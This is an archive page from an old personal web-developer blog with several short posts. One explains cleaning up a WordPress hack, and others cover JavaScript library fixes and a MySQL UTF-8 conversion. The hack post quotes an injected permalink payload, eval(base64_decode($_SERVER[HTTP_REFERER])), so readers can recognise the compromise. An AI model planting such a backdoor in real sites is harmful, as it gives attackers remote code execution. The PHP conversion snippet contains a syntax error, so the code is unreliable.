Archive for the ‘Development’ Category

What to do if your blog was hacked by evil eval

Saturday, September 5th, 2009

Weird things happens. Mostly in WordPress. One morning you see that your permalinks became a something like this:

blah/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or this:

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Or your feed crapped like this:

error on line 22 at column 71: xmlParseEntityRef: no name wordpress

Do not panic – you’re hacked. And there is three steps to get rid of it.

1) Restore your permalinks
Go to Admin panel -> Settings -> Permalinks.
Set your permalink structure to whatever it was earlier. If you don’t even imagine what it was – you can always ask google for it – just like this: site:yourblogurl.com – and you’ll see the answer in the links to your site.

2) Kill the intruder(s)
Go to your preferred mysql administration tool (say, MySqlAdmin) and run this code in the SQL window:

SELECT * FROM `wp_usermeta`
WHERE `meta_value` LIKE '%script%'

You’ll see the list of records, write down user_ids of those guys.
Go to Admin panel -> Users -> Authors & Users, copy the edit link for any user, it’ll be somethings like:

http://yourblogurl.com/wp-admin/user-edit.php?user_id=14&wp_http_referer=%2Fwp-admin%2Fusers.php

Then paste it into address line, and change user_id=XX to the first user_id you wrote. Go.
Replace First name with whatever you want (for example “z”), insert “motherfncker@test.com” into Email field (or whatever, but remember it, you’ll need it later) and set the Role into Subscriber. Push Update user. Then repeat with the next one in your user_ids list. After you finished – just type in into the search line word “motherfncker” (or whatever you set emails to). Now – just delete bastards!

3) Defend the base
Just upgrade your wordpress. If you will do it periodically – there will be no such problems at all!

If you do not have ability to use some SQL tool – you can try to blind find bastards:
Go to Admin panel -> Users -> Authors & Users
Note the number of Admin users (right under “Users” header). One of them is you, all others – bastard ones :)
Try to find max. user_id in the list by hovering your mouse over links. Then copy the edit link of the user with topmost ID, insert it into address line, change it to next number and go. Did not work? Try the next number. Or previous one. You can even loop through all IDs not in use. And when you’ll find him – you know what to do!

Popularity: 1% [?]

Tags: , , , , ,
Posted in MySQL, Optimisation, Wordpress | No Comments »

Advanced Scriplaculous Sortable Demo Fix

Monday, April 20th, 2009

Heh.

There is a good example of using nested Scriplaculous Sortables. With one little flaw – Scriplaculous ver 1.6.x is used, and when you try to execute the code with newer version of library – sections.each is not a function error pops up.

Here is the way to fix it – you’ll probably need it if you want to save the results :-D

Just replace “document.getElementsByClassName(’section’);” to “$$(‘.section’);”

Before

function getGroupOrder() {
	var sections = document.getElementsByClassName('section');
	var alerttext = '';
	sections.each(function(section) {
		var sectionID = section.id;
		var order = Sortable.serialize(sectionID);
		alerttext += sectionID + ': ' + Sortable.sequence(section) + '\n';
	});
	alert(alerttext);
	return false;
}

After

function getGroupOrder() {
	var sections = $$('.section');
	var alerttext = '';
	sections.each(function(section) {
		var sectionID = section.id;
		var order = Sortable.serialize(sectionID);
		alerttext += sectionID + ': ' + Sortable.sequence(section) + '\n';
	});
	alert(alerttext);
	return false;
}

Then modify it for your needs and go on )

What was that?
Quote:

As of Prototype 1.6, document.getElementsByClassName has been deprecated since native implementations return a NodeList rather than an Array.

Popularity: 31% [?]

Tags: ,
Posted in Development | 1 Comment »

Fixed BoxOver js library

Wednesday, May 28th, 2008

Hi there, my dear java-damned-script fans!

boxoverToday I used to find an strange bug in pretty little fine-looking-hints library, called BoxOver from here. As you know, for the chars ", [ and ] with this library you must use ", [[ and ]] to display… It works, but only once for brackets.

So, I tried to find a fix… None found. At the forum some guy gave an ugly fix with &rbr; and so on…

Shame on you guys, did you ever heard of regexp syntax? ;)

Here’s the BoxOver library with fixed [ and ] brackets display:

Download BoxOver 2.1a javascript library (28th May 2008)

BTW, when I tried to register on forum to post my fix – I can’t – because of captcha insult, and that’s why I posted it here.

Popularity: 85% [?]

Tags: ,
Posted in Development, Download, Software, Tools | 3 Comments »

User agent switcher

Wednesday, May 7th, 2008

Helpful thing (for web developer)

Firefox plugin User Agent Switcher 

But check out Safari 3.1 for Windows. Preferences => Advanced tab, enable Develop menu and – voila! – you have all you want and many more things. Actually it remembered me FireBug extension for FireFox.

Enjoy ;)

Popularity: 18% [?]

Posted in Development, Software, Tools | No Comments »

Wanna buy a PLIGG?

Tuesday, August 21st, 2007

pligg-com-sale Pligg is now for sale. Do you wanna buy it? Sale includes the pligg.com domain along with all web content created for the site including graphic design work, blog and forum administrator accounts, rights to the Sourceforge.net account. You can buy it here.

Shit.

Popularity: 59% [?]

Tags: , ,
Posted in Development, News, Software | No Comments »

Are you a web developer for real?

Friday, July 20th, 2007

Just a simple test.

Check this out.

If all you see – is your browser’s “not found” page – well, bad luck! All others – welcome to the club!

Popularity: 26% [?]

Tags: , ,
Posted in Development | No Comments »

Scrap

Tuesday, June 26th, 2007

Hmmmm…
The previous piece of code is a scrap if you have to deal with MySql4 server with all-defaults.
So… I continued my challenge – I want my data back (and workin’) ;)
Stay tuned for next round…

P.S. For MySql5 all works great…

Popularity: 16% [?]

Tags: , ,
Posted in Development, PHP | No Comments »

UTF-8 fix – when charset is set to Latin1

Saturday, June 23rd, 2007

Situation: you have MySQL 5 database with tables which claimed to have Latin1 charset. You filled the base (with MySQL Front, PhpMyAdmin or any other tool) with info. There IS non alnum chars (like TM, (c), long –, ellipsis etc.)

Now you want it back, and your pages are utf-8 encoded, but when you queries the base, ??’ sign returned instead of your cute symbols. Shit.

Never mind, if you can see those chars with PhpMyAdmin – I’ll help you to convert them to use them.

First, mysql5 seems to be utf-8 lover (even if other charset is claimed). So – it’s simple. Just exec SET NAMES utf8 right after database initialisation.

Second, query all the data you need into array.

Third, just do utf8_encode on data with your loved scrap

Forth, exec SET NAMES latin1

Fifth – write your data back

Sixth – tell your application to use utf8_decode when reading and utf8_encode when writing those data.

That’s all – now you can easilly transfer your data to MySQL4* or MySQL5 servers – and your app will work there!

Example:

// init skipped 
 
/*********************************** 
 * Database connect 
 **********************************/ 
$o_db = new myDB(DB::connect(DB_DSN)); 
$o_db->db_setFetchMode(DB_FETCHMODE_ASSOC); 
$o_db->db_query('SET NAMES utf8'); 
 
$q = 'SELECT page_id, page_head_title, page_head_description, page_head_keywords 
  FROM '.DB_PREFIX.'pages 
'; 
foreach ($page as $k => $p) 
  foreach (array('page_head_title', 'page_head_description', 'page_head_keywords') as $field) 
    $page[$k][$field] = utf8_encode($p[$field]); 
$o_db->db_query('SET NAMES latin1'); 
 
foreach ($page as $p) 
{ 
  $up = 'UPDATE '.DB_PREFIX.'pages 
    SET 
    page_head_title = '.$o_db->db_quote($p['page_head_title']).', 
    page_head_description = '.$o_db->db_quote($p['page_head_description']).', 
    page_head_keywords = '.$o_db->db_quote($p['page_head_keywords']).', 
    WHERE page_id = '.$o_db->db_quote($p['page_id']).' 
  '; 
  $o_db->db_query($up); 
}

*see next post

Popularity: 14% [?]

Tags: , ,
Posted in Development, PHP | No Comments »

WordPress 2.2.1

Friday, June 22nd, 2007

Oops, WordPress 2.2.1 is out, and I’m still not ready!

Ok, I upgraded all the blogs with my plugs, and let’s see what happens.

Popularity: 2% [?]

Tags:
Posted in Development, News, Wordpress | No Comments »

Developers versus clients

Monday, June 4th, 2007

Why always they think that coding – it’s an instant process?

Just another little quote:

We were under the understanding that coding would have been complete and we were to have seen your work late last week

Yeah, right. Do you mean next week?

Popularity: 11% [?]

Tags:
Posted in Development, News, Personal | No Comments »

PHP 4 and XML

Thursday, May 31st, 2007

What a mess.

Php 4 had no human usable XML handling implementation.
And almost all libraries it’s a mess…

I found one good article about it, but it’s in russian.
OK, I’ll try to translate it later (maybe only examples  )

And as for me – I found what i wanted. Small and effective library.

Here it is under more tag

(more…)

Popularity: 11% [?]

Tags: ,
Posted in Development, PHP | No Comments »